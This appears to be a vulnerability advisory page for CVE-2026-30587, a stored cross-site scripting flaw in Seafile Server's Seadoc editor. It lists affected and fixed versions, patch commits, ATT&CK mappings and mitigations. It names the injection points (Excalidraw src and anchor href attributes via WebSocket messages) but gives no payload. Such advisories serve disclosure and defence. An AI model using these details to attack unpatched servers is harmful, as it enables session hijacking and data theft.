Cyber Resilience

CVE-2026-30587

HighPublic PoC

Published: 25 March 2026

Published
25 March 2026
Modified
10 May 2026
KEV Added
Patch
CVSS Score v3.1 8.7 CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
EPSS Score 0.0028 19.3th percentile
Risk Priority 55 floored blend · peak EPSS

Summary

CVE-2026-30587 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Seafile Seafile Server. Its CVSS base score is 8.7 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190); ranked at the 19.3th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-30587 describes multiple stored cross-site scripting (XSS) vulnerabilities (CWE-79) in Seafile Server versions 13.0.15, 13.0.16-pro, 12.0.14, and prior releases. The issues affect the Seadoc (sdoc) editor component, where the application fails to properly sanitize WebSocket messages related to document structure updates. This enables injection of malicious JavaScript payloads through the src attribute of embedded Excalidraw whiteboards or the href attribute of anchor tags. The vulnerability carries a CVSS v3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N) and was published on 2026-03-25.

Authenticated remote attackers with low privileges can exploit these vulnerabilities by crafting and sharing malicious documents in the Seadoc editor. Exploitation requires user interaction, such as a victim opening or interacting with the affected document, after which the injected payloads execute in the context of the victim's browser. Successful attacks can lead to high confidentiality and integrity impacts, including session hijacking, data theft, or further compromise within the scoped application due to the changed scope (S:C).

Mitigation involves upgrading to the fixed versions: Seafile Server 13.0.17, 13.0.17-pro, or 12.0.20-pro. Relevant patches are detailed in Seadoc editor commit 8fa988aaede072b2ae073d1b2edcb2fc691423b2, Seahub commit 4c5301747bdb84c64b2f2b3230417df2d1cc8987, and changelogs for Seafile Professional Server 12.0 and 13.0. Additional technical details are available in the referenced GitHub Gist.

OWASP Top 10 for Web (2025)

EU & UK References

Vulnerability details

Multiple Stored XSS vulnerabilities exist in Seafile Server version 13.0.15,13.0.16-pro,12.0.14 and prior and fixed in 13.0.17, 13.0.17-pro, and 12.0.20-pro, via the Seadoc (sdoc) editor. The application fails to properly sanitize WebSocket messages regarding document structure updates. This allows authenticated remote…

more

attackers to inject malicious JavaScript payloads via the src attribute of embedded Excalidraw whiteboards or the href attribute of anchor tags

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1190 Exploit Public-Facing Application Initial Access
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.007 JavaScript Execution
Adversaries may abuse various implementations of JavaScript for execution.
T1185 Browser Session Hijacking Collection
Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.
T1534 Internal Spearphishing Lateral Movement
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization.
T1606.001 Web Cookies Credential Access
Adversaries may forge web cookies that can be used to gain access to web applications or Internet services.
Why these techniques?

Stored XSS in public-facing Seafile web app enables direct exploitation (T1190) via shared malicious documents (T1534), executing attacker-controlled JavaScript (T1059.007) that supports browser session hijacking (T1185) and web cookie theft (T1606.001).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2022-50905Shared CWE-79
CVE-2025-27271Shared CWE-79
CVE-2025-40587Shared CWE-79
CVE-2025-0918Shared CWE-79
CVE-2025-69096Shared CWE-79
CVE-2025-13761Shared CWE-79
CVE-2024-13690Shared CWE-79
CVE-2025-68012Shared CWE-79
CVE-2025-22766Shared CWE-79
CVE-2026-27359Shared CWE-79

Affected Assets

seafile
seafile server
13.0.15, 13.0.16 · ≤ 12.0.20

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

Requires validation and sanitization of untrusted WebSocket inputs in the Seadoc editor to block injection of malicious JavaScript payloads via src or href attributes.

prevent

Mandates filtering and encoding of document content on output to prevent execution of stored XSS payloads when victims interact with malicious documents.

prevent

Ensures timely identification, reporting, and patching of the stored XSS flaw as demonstrated by the fixes in Seafile versions 13.0.17, 13.0.17-pro, and 12.0.20-pro.

References